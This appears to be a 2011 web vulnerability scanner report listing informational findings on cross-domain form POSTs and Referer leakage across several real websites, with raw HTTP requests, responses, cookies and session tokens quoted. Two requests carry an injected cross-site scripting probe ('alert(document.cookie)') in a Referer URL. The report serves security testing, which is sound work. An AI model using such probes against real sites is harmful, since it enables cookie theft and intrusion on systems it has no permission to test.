<div id="connect_widget_4d44c08e7fb6b0212357453" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall" for="u137452_1"><input title="Remove" type="button" id="u137452_1" /></label></div></td><td><div class="summary_text">6K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">6K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"6ccd5234",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:337553,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"FwYsq",lhsh:"0807f",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yc\/r\/JJt3yB2LDLj.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yF\/r\/ezx-gKmDx-P.css"},"wDcHm":{"type":"css"
...[SNIP]...

21. Cross-domain POST
There are 10 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


21.1. http://astrocenter.astrology.redacted/msn/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://astrocenter.astrology.redacted
Path:   /msn/Default.aspx

Issue detail

The page contains a form which POSTs data to the domain store.astrocenter.com. The form contains the following fields:

Request

GET /msn/Default.aspx HTTP/1.1
Host: astrocenter.astrology.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:45:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
</tr>
   <form id="frmNewsletterDaily" name="frmNewsletterDaily" action="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000" method="post">
   <input type="hidden" name="De" value="StEdEm">
...[SNIP]...

21.2. http://curmudgeons.blogspot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://curmudgeons.blogspot.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: curmudgeons.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 30 Jan 2011 02:07:57 GMT
Date: Sun, 30 Jan 2011 02:07:57 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Sat, 29 Jan 2011 22:50:38 GMT
ETag: "3769e370-63c6-4a98-8a60-8feefd5f390b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Curmudgeons Corner</title>
<style>
body    {background:#666666;margin: 0px;font-family: Verdana, Arial, sans-se
...[SNIP]...
</div>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

21.3. http://fancybox.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fancybox.net
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: fancybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 9835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
</p>

                   <form id="donate_form" action="https://www.paypal.com/cgi-bin/webscr" method="post">
                       <p>
...[SNIP]...

21.4. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The page contains a form which POSTs data to the domain accountservices.passport.net. The form contains the following fields:

Request

GET /resetpw.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H48 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:17 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1
Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1
Content-Length: 1188

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...
<body onload="javascript:DoSubmit();"><form name="fmHF" id="fmHF" action="https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033" method="post" target="_top"><input type="hidden" name="mspppostint" id="mspppostint" value="CSAzsPt0tCN9aolbnioNXK9xLDW/VjpbqMOgDaanWU9LFefV8abjZ++Rwb2pl+nX4QVwTFhDZ6jsGsg6TXz7THELk+7PqRYyMvrcERzW+34vSRrwv8hqkk4cx8WMAfvZw8mwsc2T5
...[SNIP]...

21.5. http://news.discovery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.discovery.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 62539
Content-Type: text/html; charset=UTF-8
X-ServerId: 192.168.32.151
Content-Language: en-US
Cache-Control: max-age=292
Date: Sun, 30 Jan 2011 02:17:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-equiv
...[SNIP]...
<br />
<form id="newsletter-form" method="post" action="http://ebm.cheetahmail.com/r/regf2" target="_blank" onsubmit="return formClickEvent.track(this, {rule:'newsletter',name:'discovery news',action:true});">
<input value="2" type="hidden" name="a" />
...[SNIP]...

21.6. http://planetary.org/blog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://planetary.org
Path:   /blog

Issue detail

The page contains a form which POSTs data to the domain idx355.idx.net. The form contains the following fields:

Request

GET /blog HTTP/1.1
Host: planetary.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:46 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 46216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</p>


    <form action="http://idx355.idx.net/subscribe/subscribe.tml" method="POST">
<table class="info outline" cellspacing="0" cellpadding="3">
...[SNIP]...

21.7. http://www.dailygrail.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
<br />
<form action="https://www.paypal.com/cgi-bin/webscr" method="post"><input type="hidden" name="cmd" value="_donations" />
...[SNIP]...

21.8. http://www.hobbyspace.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hobbyspace.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.hobbyspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:12 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 59667

<html><!-- #BeginTemplate "/Templates/HomePage.dwt" -->
<head>
<!-- #BeginEditable "doctitle" -->
<title>HobbySpace - Home</title>


<!-- #EndEditable -->
<meta http-equiv="Content-Type" content="text
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="POST">
<input type="hidden" name="cmd" value="_xclick">
...[SNIP]...

21.9. http://www.slate.com/id/2282444/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slate.com
Path:   /id/2282444/

Issue detail

The page contains a form which POSTs data to the domain slate.us2.list-manage.com. The form contains the following fields:

Request

GET /id/2282444/ HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:55:28 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en-US" lang="en-US" xmlns:lookup="XslLookup" xmlns="xhtml"><he
...[SNIP]...
<div id="mc_embed_signup"><form action="http://slate.us2.list-manage.com/subscribe/post?u=c05b76ecf68cd5e5448448316&amp;id=d7cd644ea3" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank"><div class="mc-field-group">
...[SNIP]...

21.10. http://www.transterrestrial.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.transterrestrial.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.transterrestrial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.transterrestrial.com/wordpress/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 75605

<!-- BEGIN INDEX.PHP -->
<!--BEGIN HEADER.PHP-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
< End Amazon Honor System Paybox -->
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

22. Cross-domain Referer leakage
There are 489 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


22.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) - In Page -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/q%3B234336715%3B1-0%3B0%3B57860936%3B4307-300/250%3B40005125/40022912/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"><img src="http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.2. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5245
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:38 GMT
Expires: Sun, 30 Jan 2011 17:24:38 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) - In Page -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/s%3B234336715%3B2-0%3B0%3B57860936%3B4307-300/250%3B40005128/40022915/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"><img src="http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_CONTINUUM.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1664632858&PG=INV4QC&ASID=85e75f745ae649c9986d96549fa0e2b8&destination=;ord=1664632858? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 556
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/0/%2a/s;
...[SNIP]...
0/60;39925600/39943387/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=60DAYBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_tradefree_60_120x60_wlegal.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.4. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1664632858&PG=INV4QC&ASID=85e75f745ae649c9986d96549fa0e2b8&destination=;ord=1664632858? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 13:00:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 554

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/0/%2a/r;
...[SNIP]...
0/60;39772116/39789903/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LGETSBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/TR_LogoTextPO_No_120x60_ETS.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.5. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"><img src="http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.6. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5679
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&"><img src="http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.7. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

